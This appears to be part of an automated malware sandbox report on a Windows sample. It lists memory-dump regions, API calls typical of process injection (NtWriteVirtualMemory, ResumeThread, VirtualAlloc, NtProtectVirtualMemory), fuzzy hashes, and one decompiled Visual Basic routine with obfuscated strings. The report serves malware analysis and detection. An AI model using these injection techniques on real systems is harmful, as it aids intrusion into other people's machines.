                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryVirtualWrite
                          • String ID:
                          • API String ID: 3569954152-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryVirtualWrite
                          • String ID:
                          • API String ID: 3569954152-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction ID: 22a2a966f7c2707fa1e2e02cbb775198114843ade7ea44727070181cc235b094
                          • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction Fuzzy Hash: B5F0A726BC0297DA67296A38D5643E32B2B9C732247CC4545CCA5CB968F721D0D5C305
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                          • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction ID: 684865884c2959b93db608ca1b9bb9e5f2eab58b8f0cc8833163df71ff245eaa
                          • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction Fuzzy Hash: 54D012245903458D7F196D71C6E438B3A2A5C95004798891CD892D2508EB32C0498514
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 62%
                          			E0040BE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				short _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				void* _v44;
                          				char _v48;
                          				char _v52;
                          				char _v60;
                          				signed int _v64;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _t89;
                          				signed int _t95;
                          				signed int _t112;
                          				signed int _t115;
                          				void* _t127;
                          				void* _t129;
                          				intOrPtr _t130;
                          
                          				_t130 = _t129 - 0xc;
                          				 *[fs:0x0] = _t130;
                          				L00401120();
                          				_v16 = _t130;
                          				_v12 = 0x4010d0;
                          				_v8 = _a4 & 0x00000001;
                          				_a4 = _a4 & 0x000000fe;
                          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401126, _t127);
                          				_t89 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0);
                          				asm("fclex");
                          				_v64 = _t89;
                          				if(_v64 >= 0) {
                          					_v76 = _v76 & 0x00000000;
                          				} else {
                          					_push(0x14c);
                          					_push(0x4020d4);
                          					_push(_a4);
                          					_push(_v64);
                          					L004011F2();
                          					_v76 = _t89;
                          				}
                          				L004011DA();
                          				L004011DA();
                          				_t95 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v36, 0x60c952,  &_v40,  &_v48);
                          				_v64 = _t95;
                          				if(_v64 >= 0) {
                          					_v80 = _v80 & 0x00000000;
                          				} else {
                          					_push(0x6fc);
                          					_push(0x402104);
                          					_push(_a4);
                          					_push(_v64);
                          					L004011F2();
                          					_v80 = _t95;
                          				}
                          				_v32 = _v48;
                          				L004011D4();
                          				L004011DA();
                          				_v60 =  *0x4010c8;
                          				L004011DA();
                          				_v52 = 0x2b299e;
                          				_v48 = 0x7eadd8;
                          				 *((intOrPtr*)(_t130 + 0xc)) =  *0x4010c0;
                          				 *((intOrPtr*)( *_a4 + 0x704))(_a4, L"o9YGH4XNtHpCBImXjLZ2nNt991",  &_v48,  &_v36,  &_v52, 0x335dba,  &_v36,  &_v60,  &_v40, 0x476f,  &_v44, 2,  &_v36,  &_v40);
                          				_v28 = _v44;
                          				L004011D4();
                          				_t112 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v36,  &_v40);
                          				asm("fclex");
                          				_v64 = _t112;
                          				if(_v64 >= 0) {
                          					_v84 = _v84 & 0x00000000;
                          				} else {
                          					_push(0x2b4);
                          					_push(0x4020d4);
                          					_push(_a4);
                          					_push(_v64);
                          					L004011F2();
                          					_v84 = _t112;
                          				}
                          				_t115 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
                          				_v64 = _t115;
                          				if(_v64 >= 0) {
                          					_v88 = _v88 & 0x00000000;
                          				} else {
                          					_push(0x6f8);
                          					_push(0x402104);
                          					_push(_a4);
                          					_push(_v64);
                          					L004011F2();
                          					_v88 = _t115;
                          				}
                          				_v8 = 0;
                          				asm("wait");
                          				_push(E0040C034);
                          				return _t115;
                          			}


                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BE3C
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BE95
                          • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEAB
                          • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEB8
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006FC), ref: 0040BEF5
                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BF13
                          • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF23
                          • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF39
                          • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,002B299E,00335DBA,?,?,?,0000476F,?), ref: 0040BF9D
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,000002B4), ref: 0040BFCE
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006F8), ref: 0040C003
                          Strings
                          • eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121, xrefs: 0040BF31
                          • o9YGH4XNtHpCBImXjLZ2nNt991, xrefs: 0040BF78
                          • MNMtjbRHx4PbamJpWQ2180, xrefs: 0040BF1B
                          • bqBgWjLCBrgJI06100, xrefs: 0040BEB0
                          • jmScNPZCAAwKcVgBIo2X100, xrefs: 0040BEA3
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: __vba$CheckCopyHresult$FreeList$Chkstk
                          • String ID: MNMtjbRHx4PbamJpWQ2180$bqBgWjLCBrgJI06100$eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121$jmScNPZCAAwKcVgBIo2X100$o9YGH4XNtHpCBImXjLZ2nNt991
                          • API String ID: 136807637-645893437
                          • Opcode ID: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                          • Instruction ID: 519a5d37f5daf25abc16070865b238d90d8f52d6e4d3c1e414c6b7a1e94efcca
                          • Opcode Fuzzy Hash: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                          • Instruction Fuzzy Hash: A061F471900209EFCB04DF95D985BEDBBB9FF08344F10807AFA05BA1A0D77999558F98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LdrInitializeThunk.NTDLL(021D157A,?,00000000,?,00000017,0000035D,?,021D39E3,?), ref: 021D3769
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ninet.dll
                          • API String ID: 2994545307-2962335871
                          • Opcode ID: 4518ea85d2ac9dadf7466eb1f9da38273d6e1b7d1fa171b52e1f8831b68927af
                          • Instruction ID: 685678d467900b97dc4a1edcc45c40ee5058a2c2067cedf58eea6dbe1658d169
                          • Opcode Fuzzy Hash: 4518ea85d2ac9dadf7466eb1f9da38273d6e1b7d1fa171b52e1f8831b68927af
                          • Instruction Fuzzy Hash: 3FD0A7B11856478FC215B668864BB973BA19F521D1B2DC49858E1CB236CF20F61AEBC3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                          • Instruction ID: 543fa372f36628f1aa98f6d776eddfbd376170e5aaa6fc3331ea6e28a99fae3b
                          • Opcode Fuzzy Hash: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                          • Instruction Fuzzy Hash: 1BD15ED5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                          • Instruction ID: 84b2e7897ca596aa20df8bdb68045b0fdafeb33706d3ab2e5523f27a769e2b4a
                          • Opcode Fuzzy Hash: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                          • Instruction Fuzzy Hash: 12D15ED5A2E703C5E49365B140C547154A4EEA735A5738BBB6B23728C2A33E834B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                          • Instruction ID: af1e297680ab8320f1ed8e5527f57ac378e85804eaefb24c808ebcf20a63a9a1
                          • Opcode Fuzzy Hash: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                          • Instruction Fuzzy Hash: AED16DD5A2E703C5F49365B100C547154A4EEA735A5778BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                          • Instruction ID: c8f70a2befe2d3146102092da247e2e55b70081f6e0450f15e50d42f34d72ca4
                          • Opcode Fuzzy Hash: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                          • Instruction Fuzzy Hash: E8D15DD5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                          • Instruction ID: 74306f00ae095a0a012ff5a82744488db1a2801a940f629d53b5ef637f3963f5
                          • Opcode Fuzzy Hash: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                          • Instruction Fuzzy Hash: 71D16ED5A2E703C5E49365B140C547154A4EEA735A5778BBB6B23728C2A33E834B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                          • Instruction ID: d9f6b5232ee310b46ebbe91d7dd7da64dcf36d20b152a7469316f291c2d61c15
                          • Opcode Fuzzy Hash: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                          • Instruction Fuzzy Hash: 3CD16DD5A2E703C6E49365B140C547154A4EEA735A5738BBB6B33728C2A33E434B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 548dfafec6ba45fd659f34f4d23e68b6bfc5f564aac0b6eaf969819023fdaea6
                          • Instruction ID: 9bb89779cbc3c21536d088364d1e18dca23c220b01f23356270f8f07bffe35f3
                          • Opcode Fuzzy Hash: 548dfafec6ba45fd659f34f4d23e68b6bfc5f564aac0b6eaf969819023fdaea6
                          • Instruction Fuzzy Hash: B2D16DD5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E434B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: i
                          • API String ID: 4275171209-3865851505
                          • Opcode ID: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                          • Instruction ID: c6b09f2b99b990514ffbca78edca35c2541b70a46a65939152e73e3d93820d41
                          • Opcode Fuzzy Hash: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                          • Instruction Fuzzy Hash: 565159D5A2E703C6F493A1B040C15315090EED735A5738BBB5B23B28C2A33E925B369F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                          • Instruction ID: ef83c19576b9dbf9b7ce523bc85d0a4ad4d96e23d79a20eb3dcf87da6b6b1ce8
                          • Opcode Fuzzy Hash: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                          • Instruction Fuzzy Hash: 81919F24AC0316EEEF3869648CA87FE2263DF46350FDA452ADC9A87045CB35C4C7C952
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                          • Instruction ID: a073c304f058659a9ca12e85f17a271484b37ede3e09ed2490ba2152f8edd9ae
                          • Opcode Fuzzy Hash: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                          • Instruction Fuzzy Hash: 0F715024AC0305FAEF3879A44CA87FE1227DF45364FDA452ADCDA97085C73984CBC912
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                          • Instruction ID: 2e173ccf0cd3e19296a94bc7acb8f5071b6c496108105ec36386d541bd9a3204
                          • Opcode Fuzzy Hash: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                          • Instruction Fuzzy Hash: 0B715F24AC0305FAEF3839A45CA87FE1227DF45364FDA412ADC9A97085CB3984CBC913
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                          • Instruction ID: 586d15d8d9ee6445777eab541407409e17f36ad2fb4e0230f9e0068969959461
                          • Opcode Fuzzy Hash: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                          • Instruction Fuzzy Hash: DD614E24AC0305FAEF3829A45CA87FE1227DF45364FDA452ADC9A96085CB3584CBC913
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                          • Instruction ID: b1e001cb04089190554576d2978040662632262b1bbb837ccedeeacf5711a904
                          • Opcode Fuzzy Hash: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                          • Instruction Fuzzy Hash: B1615B24AC4315FEEF3829A45CA97FE1223DF46364FDA452BDC9A96095C73588CBC903
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
